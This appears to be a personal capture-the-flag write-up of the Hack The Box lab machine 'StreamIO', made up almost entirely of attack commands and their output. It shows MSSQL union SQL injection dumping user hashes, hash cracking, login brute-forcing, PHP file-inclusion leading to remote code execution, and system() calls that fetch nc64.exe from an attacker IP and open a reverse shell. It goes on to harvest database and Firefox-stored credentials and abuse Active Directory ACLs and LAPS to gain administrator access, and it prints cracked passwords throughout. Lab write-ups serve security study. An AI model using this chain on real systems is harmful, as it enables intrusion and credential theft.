📽️

StreamIO

 
53,80,88,135,139,389,443,445,464,593,636,3268,3269,5985,9389,49667,49673,49674,49732,57840
notion image
10.10.11.158 watch.streamIO.htb streamIO.htb dc.streamIO.htb
 
https://watch.streamio.htb/ http://streamio.htb
notion image
notion image
 
gobuster dir -u https://watch.streamio.htb -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -k -x php
notion image
notion image
notion image
notion image
try sqli..
the original sql query should be ended with like '%<input>%'
notion image
try search ha' --
notion image
haha' union select 1,2,3,4,5;--
haha' union select 1,2,3,4,5,6;--
notion image
haha' union select 1,@version,3,4,5,6;-- - Microsoft SQL Server 2019 (RTM) - 15.0.2000.5 (X64) Sep 24 2019 13:48:23 Copyright (C) 2019 Microsoft Corporation Express Edition (64-bit) on Windows Server 2019 Standard 10.0 (Build 17763: ) (Hypervisor)
It’s MSSQL
cheatsheet:
 
haha' union select 1,name,3,4,5,6 from master..sysdatabases;-- -
notion image
haha' union select 1,name,id,4,5,6 from streamio..sysobjects where xtype='U';--
notion image
haha' union select 1,name,id,4,5,6 FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = 'users'); --
notion image
haha' union select 1,concat(username,':',password),2,4,5,6 FROM users; --
notion image
admin:665a50ac9eaa781e4f7f04199db97a11 Alexendra:1c2b3d8270321140e5153f6637d3ee53 Austin:0049ac57646627b8d7aeaccf8b6a936f Barbra:3961548825e3e21df5646cafe11c6c76 Barry:54c88b2dbd7b1a84012fabc1a4c73415 Baxter:22ee218331afd081b0dcd8115284bae3 Bruno:2a4e2cf22dd8fcb45adcb91be1e22ae8 Carmon:35394484d89fcfdb3c5e447fe749d213 Clara:ef8f3d30a856cf166fb8215aca93e9ff Diablo:ec33265e5fc8c2f1b0c137bb7b3632b5 Garfield:8097cedd612cc37c29db152b6e9edbd3 Gloria:0cfaaaafb559f081df2befbe66686de0 James:c660060492d9edcaa8332d89c99c9239 Juliette:6dcd87740abb64edfa36d170f0d5450d Lauren:08344b85b329d7efd611b7a7743e8a09 Lenord:ee0b8a0937abd60c2882eacb2f8dc49f Lucifer:7df45a9e3de3863807c026ba48e55fb3 Michelle:b83439b16f844bd6ffe35c02fe21b3c0 Oliver:fd78db29173a5cf701bd69027cb9bf6b Robert:f03b910e2bd0313a23fdd7575f34a694 Robin:dc332fb5576e9631c9dae83f194f8e70 Sabrina:f87d3c0d6c8fd686aacc6627f1f493a5 Samantha:083ffae904143c4796e464dac33c1f7d Stan:384463526d288edcc95fc3701e523bc7 Thane:3577c47eb1e12c8ba021611e1280753c Theodore:925e5408ecb67aea449373d668b7359e Victor:bf55e15b119860a6e6b5a164377da719 Victoria:b22abb47a02b52d5dfa27fb0b534f693 William:d62be0dc82071bccc1322d64ec5b6c51 yoshihide:b779ba15cedfd22a023c4d8bcf5f2332
notion image
hashcat -m 0 creds.txt /usr/share/wordlists/rockyou.txt --user
admin:665a50ac9eaa781e4f7f04199db97a11:paddpadd Barry:54c88b2dbd7b1a84012fabc1a4c73415:$hadoW Bruno:2a4e2cf22dd8fcb45adcb91be1e22ae8:$monique$1991$ Clara:ef8f3d30a856cf166fb8215aca93e9ff:%$clara Juliette:6dcd87740abb64edfa36d170f0d5450d:$3xybitch Lauren:08344b85b329d7efd611b7a7743e8a09:##123a8j8w5123## Lenord:ee0b8a0937abd60c2882eacb2f8dc49f:physics69i Michelle:b83439b16f844bd6ffe35c02fe21b3c0:!?Love?!123 Sabrina:f87d3c0d6c8fd686aacc6627f1f493a5:!!sabrina$ Thane:3577c47eb1e12c8ba021611e1280753c:highschoolmusical Victoria:b22abb47a02b52d5dfa27fb0b534f693:!5psycho8! yoshihide:b779ba15cedfd22a023c4d8bcf5f2332:66boysandgirls..
>> creds
cat creds | awk -F ':' '{print $1}' >> username.txt cat creds | awk -F ':' '{print $3}' > password.txt
notion image
smb cracking failed
cat creds | cut -d: -f 1,3 | tee pass
hydra -C pass streamio.htb https-post-form "/login.php:username=^USER^&password=^PASS^:F=failed"
notion image
https://streamio.htb/admin/
gobuster dir -u https://streamio.htb/admin/ -k -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php
To enumerate parameter names
wfuzz -u https://streamio.htb/admin/?FUZZ= -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -H "Cookie:PHPSESSID=bkudr03jnlhe8h5mutnomjfm6a" --hh 1678
notion image
https://streamio.htb/admin/?debug=
 
notion image
 
try file inclusion
php://filter/convert.base64-encode/resource=master.php
get base64 encode
onlyPGgxPk1vdmllIG1hbmFnbWVudDwvaDE+DQo8P3BocA0KaWYoIWRlZmluZWQoJ2luY2x1ZGVkJykpDQoJZGllKCJPbmx5IGFjY2Vzc2FibGUgdGhyb3VnaCBpbmNsdWRlcyIpOw0KaWYoaXNzZXQoJF9QT1NUWydtb3ZpZV9pZCddKSkNCnsNCiRxdWVyeSA9ICJkZWxldGUgZnJvbSBtb3ZpZXMgd2hlcmUgaWQgPSAiLiRfUE9TVFsnbW92aWVfaWQnXTsNCiRyZXMgPSBzcWxzcnZfcXVlcnkoJGhhbmRsZSwgJHF1ZXJ5LCBhcnJheSgpLCBhcnJheSgiU2Nyb2xsYWJsZSI9PiJidWZmZXJlZCIpKTsNCn0NCiRxdWVyeSA9ICJzZWxlY3QgKiBmcm9tIG1vdmllcyBvcmRlciBieSBtb3ZpZSI7DQokcmVzID0gc3Fsc3J2X3F1ZXJ5KCRoYW5kbGUsICRxdWVyeSwgYXJyYXkoKSwgYXJyYXkoIlNjcm9sbGFibGUiPT4iYnVmZmVyZWQiKSk7DQp3aGlsZSgkcm93ID0gc3Fsc3J2X2ZldGNoX2FycmF5KCRyZXMsIFNRTFNSVl9GRVRDSF9BU1NPQykpDQp7DQo/Pg0KDQo8ZGl2Pg0KCTxkaXYgY2xhc3M9ImZvcm0tY29udHJvbCIgc3R5bGU9ImhlaWdodDogM3JlbTsiPg0KCQk8aDQgc3R5bGU9ImZsb2F0OmxlZnQ7Ij48P3BocCBlY2hvICRyb3dbJ21vdmllJ107ID8+PC9oND4NCgkJPGRpdiBzdHlsZT0iZmxvYXQ6cmlnaHQ7cGFkZGluZy1yaWdodDogMjVweDsiPg0KCQkJPGZvcm0gbWV0aG9kPSJQT1NUIiBhY3Rpb249Ij9tb3ZpZT0iPg0KCQkJCTxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9Im1vdmllX2lkIiB2YWx1ZT0iPD9waHAgZWNobyAkcm93WydpZCddOyA/PiI+DQoJCQkJPGlucHV0IHR5cGU9InN1Ym1pdCIgY2xhc3M9ImJ0biBidG4tc20gYnRuLXByaW1hcnkiIHZhbHVlPSJEZWxldGUiPg0KCQkJPC9mb3JtPg0KCQk8L2Rpdj4NCgk8L2Rpdj4NCjwvZGl2Pg0KPD9waHANCn0gIyB3aGlsZSBlbmQNCj8+DQo8YnI+PGhyPjxicj4NCjxoMT5TdGFmZiBtYW5hZ21lbnQ8L2gxPg0KPD9waHANCmlmKCFkZWZpbmVkKCdpbmNsdWRlZCcpKQ0KCWRpZSgiT25seSBhY2Nlc3NhYmxlIHRocm91Z2ggaW5jbHVkZXMiKTsNCiRxdWVyeSA9ICJzZWxlY3QgKiBmcm9tIHVzZXJzIHdoZXJlIGlzX3N0YWZmID0gMSAiOw0KJHJlcyA9IHNxbHNydl9xdWVyeSgkaGFuZGxlLCAkcXVlcnksIGFycmF5KCksIGFycmF5KCJTY3JvbGxhYmxlIj0+ImJ1ZmZlcmVkIikpOw0KaWYoaXNzZXQoJF9QT1NUWydzdGFmZl9pZCddKSkNCnsNCj8+DQo8ZGl2IGNsYXNzPSJhbGVydCBhbGVydC1zdWNjZXNzIj4gTWVzc2FnZSBzZW50IHRvIGFkbWluaXN0cmF0b3I8L2Rpdj4NCjw/cGhwDQp9DQokcXVlcnkgPSAic2VsZWN0ICogZnJvbSB1c2VycyB3aGVyZSBpc19zdGFmZiA9IDEiOw0KJHJlcyA9IHNxbHNydl9xdWVyeSgkaGFuZGxlLCAkcXVlcnksIGFycmF5KCksIGFycmF5KCJTY3JvbGxhYmxlIj0+ImJ1ZmZlcmVkIikpOw0Kd2hpbGUoJHJvdyA9IHNxbHNydl9mZXRjaF9hcnJheSgkcmVzLCBTUUxTUlZfRkVUQ0hfQVNTT0MpKQ0Kew0KPz4NCg0KPGRpdj4NCgk8ZGl2IGNsYXNzPSJmb3JtLWNvbnRyb2wiIHN0eWxlPSJoZWlnaHQ6IDNyZW07Ij4NCgkJPGg0IHN0eWxlPSJmbG9hdDpsZWZ0OyI+PD9waHAgZWNobyAkcm93Wyd1c2VybmFtZSddOyA/PjwvaDQ+DQoJCTxkaXYgc3R5bGU9ImZsb2F0OnJpZ2h0O3BhZGRpbmctcmlnaHQ6IDI1cHg7Ij4NCgkJCTxmb3JtIG1ldGhvZD0iUE9TVCI+DQoJCQkJPGlucHV0IHR5cGU9ImhpZGRlbiIgbmFtZT0ic3RhZmZfaWQiIHZhbHVlPSI8P3BocCBlY2hvICRyb3dbJ2lkJ107ID8+Ij4NCgkJCQk8aW5wdXQgdHlwZT0ic3VibWl0IiBjbGFzcz0iYnRuIGJ0bi1zbSBidG4tcHJpbWFyeSIgdmFsdWU9IkRlbGV0ZSI+DQoJCQk8L2Zvcm0+DQoJCTwvZGl2Pg0KCTwvZGl2Pg0KPC9kaXY+DQo8P3BocA0KfSAjIHdoaWxlIGVuZA0KPz4NCjxicj48aHI+PGJyPg0KPGgxPlVzZXIgbWFuYWdtZW50PC9oMT4NCjw/cGhwDQppZighZGVmaW5lZCgnaW5jbHVkZWQnKSkNCglkaWUoIk9ubHkgYWNjZXNzYWJsZSB0aHJvdWdoIGluY2x1ZGVzIik7DQppZihpc3NldCgkX1BPU1RbJ3VzZXJfaWQnXSkpDQp7DQokcXVlcnkgPSAiZGVsZXRlIGZyb20gdXNlcnMgd2hlcmUgaXNfc3RhZmYgPSAwIGFuZCBpZCA9ICIuJF9QT1NUWyd1c2VyX2lkJ107DQokcmVzID0gc3Fsc3J2X3F1ZXJ5KCRoYW5kbGUsICRxdWVyeSwgYXJyYXkoKSwgYXJyYXkoIlNjcm9sbGFibGUiPT4iYnVmZmVyZWQiKSk7DQp9DQokcXVlcnkgPSAic2VsZWN0ICogZnJvbSB1c2VycyB3aGVyZSBpc19zdGFmZiA9IDAiOw0KJHJlcyA9IHNxbHNydl9xdWVyeSgkaGFuZGxlLCAkcXVlcnksIGFycmF5KCksIGFycmF5KCJTY3JvbGxhYmxlIj0+ImJ1ZmZlcmVkIikpOw0Kd2hpbGUoJHJvdyA9IHNxbHNydl9mZXRjaF9hcnJheSgkcmVzLCBTUUxTUlZfRkVUQ0hfQVNTT0MpKQ0Kew0KPz4NCg0KPGRpdj4NCgk8ZGl2IGNsYXNzPSJmb3JtLWNvbnRyb2wiIHN0eWxlPSJoZWlnaHQ6IDNyZW07Ij4NCgkJPGg0IHN0eWxlPSJmbG9hdDpsZWZ0OyI+PD9waHAgZWNobyAkcm93Wyd1c2VybmFtZSddOyA/PjwvaDQ+DQoJCTxkaXYgc3R5bGU9ImZsb2F0OnJpZ2h0O3BhZGRpbmctcmlnaHQ6IDI1cHg7Ij4NCgkJCTxmb3JtIG1ldGhvZD0iUE9TVCI+DQoJCQkJPGlucHV0IHR5cGU9ImhpZGRlbiIgbmFtZT0idXNlcl9pZCIgdmFsdWU9Ijw/cGhwIGVjaG8gJHJvd1snaWQnXTsgPz4iPg0KCQkJCTxpbnB1dCB0eXBlPSJzdWJtaXQiIGNsYXNzPSJidG4gYnRuLXNtIGJ0bi1wcmltYXJ5IiB2YWx1ZT0iRGVsZXRlIj4NCgkJCTwvZm9ybT4NCgkJPC9kaXY+DQoJPC9kaXY+DQo8L2Rpdj4NCjw/cGhwDQp9ICMgd2hpbGUgZW5kDQo/Pg0KPGJyPjxocj48YnI+DQo8Zm9ybSBtZXRob2Q9IlBPU1QiPg0KPGlucHV0IG5hbWU9ImluY2x1ZGUiIGhpZGRlbj4NCjwvZm9ybT4NCjw/cGhwDQppZihpc3NldCgkX1BPU1RbJ2luY2x1ZGUnXSkpDQp7DQppZigkX1BPU1RbJ2luY2x1ZGUnXSAhPT0gImluZGV4LnBocCIgKSANCmV2YWwoZmlsZV9nZXRfY29udGVudHMoJF9QT1NUWydpbmNsdWRlJ10pKTsNCmVsc2UNCmVjaG8oIiAtLS0tIEVSUk9SIC0tLS0gIik7DQp9DQo/Pg==
decode:
¢yr<h1>Movie managment</h1> <?php if(!defined('included')) die("Only accessable through includes"); if(isset($_POST['movie_id'])) { $query = "delete from movies where id = ".$_POST['movie_id']; $res = sqlsrv_query($handle, $query, array(), array("Scrollable"=>"buffered")); } $query = "select * from movies order by movie"; $res = sqlsrv_query($handle, $query, array(), array("Scrollable"=>"buffered")); while($row = sqlsrv_fetch_array($res, SQLSRV_FETCH_ASSOC)) { ?> <div> <div class="form-control" style="height: 3rem;"> <h4 style="float:left;"><?php echo $row['movie']; ?></h4> <div style="float:right;padding-right: 25px;"> <form method="POST" action="?movie="> <input type="hidden" name="movie_id" value="<?php echo $row['id']; ?>"> <input type="submit" class="btn btn-sm btn-primary" value="Delete"> </form> </div> </div> </div> <?php } # while end ?> <br><hr><br> <h1>Staff managment</h1> <?php if(!defined('included')) die("Only accessable through includes"); $query = "select * from users where is_staff = 1 "; $res = sqlsrv_query($handle, $query, array(), array("Scrollable"=>"buffered")); if(isset($_POST['staff_id'])) { ?> <div class="alert alert-success"> Message sent to administrator</div> <?php } $query = "select * from users where is_staff = 1"; $res = sqlsrv_query($handle, $query, array(), array("Scrollable"=>"buffered")); while($row = sqlsrv_fetch_array($res, SQLSRV_FETCH_ASSOC)) { ?> <div> <div class="form-control" style="height: 3rem;"> <h4 style="float:left;"><?php echo $row['username']; ?></h4> <div style="float:right;padding-right: 25px;"> <form method="POST"> <input type="hidden" name="staff_id" value="<?php echo $row['id']; ?>"> <input type="submit" class="btn btn-sm btn-primary" value="Delete"> </form> </div> </div> </div> <?php } # while end ?> <br><hr><br> <h1>User managment</h1> <?php if(!defined('included')) die("Only accessable through includes"); if(isset($_POST['user_id'])) { $query = "delete from users where is_staff = 0 and id = ".$_POST['user_id']; $res = sqlsrv_query($handle, $query, array(), array("Scrollable"=>"buffered")); } $query = "select * from users where is_staff = 0"; $res = sqlsrv_query($handle, $query, array(), array("Scrollable"=>"buffered")); while($row = sqlsrv_fetch_array($res, SQLSRV_FETCH_ASSOC)) { ?> <div> <div class="form-control" style="height: 3rem;"> <h4 style="float:left;"><?php echo $row['username']; ?></h4> <div style="float:right;padding-right: 25px;"> <form method="POST"> <input type="hidden" name="user_id" value="<?php echo $row['id']; ?>"> <input type="submit" class="btn btn-sm btn-primary" value="Delete"> </form> </div> </div> </div> <?php } # while end ?> <br><hr><br> <form method="POST"> <input name="include" hidden> </form> <?php if(isset($_POST['include'])) { if($_POST['include'] !== "index.php" ) eval(file_get_contents($_POST['include'])); else echo(" ---- ERROR ---- "); } ?>
 
 
system("powershell -c wget http://10.10.16.6/nc64.exe -outfile \\programdata\\nc64.exe"); system("\\programdata\\nc64.exe -e powershell 10.10.16.6 443");
 
curl -X POST 'https://streamio.htb/admin/?debug=master.php' -k -b 'PHPSESSID=bkudr03jnlhe8h5mutnomjfm6a' -d 'include=http://10.10.16.6/shell.php'
 
got the threshold
notion image
PS C:\inetpub\streamio.htb\admin> whoami │ whoami │ streamio\yoshihide
look into search.php under /watch.streamio.htb
notion image
$connection = array("Database"=>"STREAMIO", "UID" => "db_user", "PWD" => 'B1@hB1@hB1@h');
 
try search for sensitive data under windows
dir -recurse *.php | select-string -pattern "database"
admin\index.php:9:$connection = array("Database"=>"STREAMIO", "UID" => "db_admin", "PWD" => 'B1@hx31234567890'); login.php:46:$connection = array("Database"=>"STREAMIO" , "UID" => "db_user", "PWD" => 'B1@hB1@hB1@h'); register.php:81: $connection = array("Database"=>"STREAMIO", "UID" => "db_admin", "PWD" => 'B1@hx31234567890');
db_admin:B1@hx31234567890 db_user:B1@hB1@hB1@h
PS C:\inetpub\streamio.htb> where.exe sqlcmd where.exe sqlcmd C:\Program Files\Microsoft SQL Server\Client SDK\ODBC\170\Tools\Binn\SQLCMD.EXE
sqlcmd -S localhost -U db_admin -P B1@hx31234567890 -d streamio_backup -Q "select name from sys.tables;"
sqlcmd -S localhost -U db_admin -P B1@hx31234567890 -d streamio_backup -Q "select * from users;"
notion image
cat userpass |awk -F ' ' '{print $2":"$3}' | tee userpass
then try hashcat
nikk37:389d14cb8e4e9b94b137deb1caf0612a:get_dem_girls2@yahoo.com yoshihide:b779ba15cedfd22a023c4d8bcf5f2332:66boysandgirls.. Lauren:08344b85b329d7efd611b7a7743e8a09:##123a8j8w5123## Sabrina:f87d3c0d6c8fd686aacc6627f1f493a5:!!sabrina$
notion image
 
try creds of nikk37
evil-winrm -u nikk37 -p get_dem_girls2@yahoo.com -i 10.10.11.158
notion image
get the first flag.
 
 
found by winPEAS
C:\Users\All Users\Mozilla-1de4eec8-1241-4177-a864-e594e8d1fb38\updates\E7CF176E110C211B\active-update.xml: "c801bf41e708ce0b1fea7cba12bc01c9a5b138e9b97aa893dabd40a4b16c41e7c9af01069136cd2282dabba352304f722e6ee0555b6e117ab003d9000435df92" C:\Users\All Users\Mozilla-1de4eec8-1241-4177-a864-e594e8d1fb38\updates\E7CF176E110C211B\active-update.xml: "57b73de48c7802f9a175e18da56d424844745201853b43da8c1d55cab43a45dfc72b78c08e833235da1564c2ffe15509852900113a17dc49ca688de659e5e141"
C:\Users\nikk37\AppData\Roaming\Mozilla\Firefox\Profiles
 
download json files under the folder
 
cracking, searching on google.
 
notion image
git clone https://github.com/lclevy/firepwd.git
{"nextId":5,"logins":[{"id":1,"hostname":"https://slack.streamio.htb","httpRealm":null,"formSubmitURL":"","usernameField":"","passwordField":"","encryptedUsername":"MDIEEPgAAAAAAAAAAAAAAAAAAAEwFAYIKoZIhvcNAwcECG2cZGM1+s+hBAiQvduUzZPkCw==","encryptedPassword":"MEIEEPgAAAAAAAAAAAAAAAAAAAEwFAYIKoZIhvcNAwcECKA5q3v2TxvuBBjtXIyW2UjOBvrg700JOU1yfrb0EnMRelw=","guid":"{9867a888-c468-4173-b2f4-329a1ec7fa60}","encType":1,"timeCreated":1645526456872,"timeLastUsed":1645526456872,"timePasswordChanged":1645526456872,"timesUsed":1},{"id":2,"hostname":"https://slack.streamio.htb","httpRealm":null,"formSubmitURL":"","usernameField":"","passwordField":"","encryptedUsername":"MDIEEPgAAAAAAAAAAAAAAAAAAAEwFAYIKoZIhvcNAwcECDMUru7zbEb0BAiinvqXr8Trkg==","encryptedPassword":"MDoEEPgAAAAAAAAAAAAAAAAAAAEwFAYIKoZIhvcNAwcECOXW0KzZftfWBBARYsMPvSrUwx8+QfJdxzT+","guid":"{739bd2a5-5fec-4e08-97d2-3c619bf02be2}","encType":1,"timeCreated":1645526470377,"timeLastUsed":1645526470377,"timePasswordChanged":1645526470377,"timesUsed":1},{"id":3,"hostname":"https://slack.streamio.htb","httpRealm":null,"formSubmitURL":"","usernameField":"","passwordField":"","encryptedUsername":"MDoEEPgAAAAAAAAAAAAAAAAAAAEwFAYIKoZIhvcNAwcECPtpFUOBoOFABBDVCjdAdstUxzB6i9DCqvOw","encryptedPassword":"MDoEEPgAAAAAAAAAAAAAAAAAAAEwFAYIKoZIhvcNAwcECCocciyfDsthBBDm3YSuhBsW3roo3l3zOUuF","guid":"{a98a87bc-86aa-489c-9227-d6579ab5148b}","encType":1,"timeCreated":1645526484137,"timeLastUsed":1645526484137,"timePasswordChanged":1645526484137,"timesUsed":1},{"id":4,"hostname":"https://slack.streamio.htb","httpRealm":null,"formSubmitURL":"","usernameField":"","passwordField":"","encryptedUsername":"MDIEEPgAAAAAAAAAAAAAAAAAAAEwFAYIKoZIhvcNAwcECB1j+gQdXzIuBAgO0o/N3J2MrQ==","encryptedPassword":"MDoEEPgAAAAAAAAAAAAAAAAAAAEwFAYIKoZIhvcNAwcECNt9zddW+/h7BBCBgoQVGaDQjF2IpeQEl/Td","guid":"{2be21548-7c50-42f0-8ef6-b33b1e77f150}","encType":1,"timeCreated":1645526511842,"timeLastUsed":1645526511842,"timePasswordChanged":1645526511842,"timesUsed":1}],"potentiallyVulnerablePasswords":[],"dismissedBreachAlertsByLoginGUID":{},"version":3}
python3 firepwd.py -d firefox
notion image
https://slack.streamio.htb:b'admin',b'JDg0dd1s@d0p3cr3@t0r' https://slack.streamio.htb:b'nikk37',b'n1kk1sd0p3t00:)' https://slack.streamio.htb:b'yoshihide',b'paddpadd@12' https://slack.streamio.htb:b'JDgodd',b'password@12'
try cracking smb and winrm
notion image
crackmapexec smb 10.10.11.158 -u firefoxname -p firefoxpass --continue-on-success
notion image
JDgodd:JDg0dd1s@d0p3cr3@t0r
notion image
try bloodhound to find info of AD
bloodhound-python --dns-tcp -ns 10.10.11.158 -c All -u JDgodd -p 'JDg0dd1s@d0p3cr3@t0r' -d streamio.htb -dc streamio.htb --zip
notion image
$pass = ConvertTo-SecureString 'JDg0dd1s@d0p3cr3@t0r' -AsPlainText -Force $cred = New-Object System.Management.Automation.PSCredential('streamio.htb\JDgodd', $pass)
run powerview.ps1 first, then
notion image
Add-DomainObjectAcl -Credential $cred -TargetIdentity "Core Staff" -PrincipalIdentity "streamio\JDgodd"
Add-DomainGroupMember -Identity 'Core Staff' -Members 'StreamIO\JDgodd' -Credential $Cred
notion image
Get-AdComputer -Filter * -Properties ms-Mcs-AdmPwd -Credential $cred
notion image
no found, try crackmapexec
crackmapexec smb streamio.htb -u JDgodd -p 'JDg0dd1s@d0p3cr3@t0r' --laps --ntds
notion image
administrator:Hr#3aMyX+A3+p8
evil-winrm -u administrator -p 'Hr#3aMyX+A3+p8' -i 10.10.11.158
notion image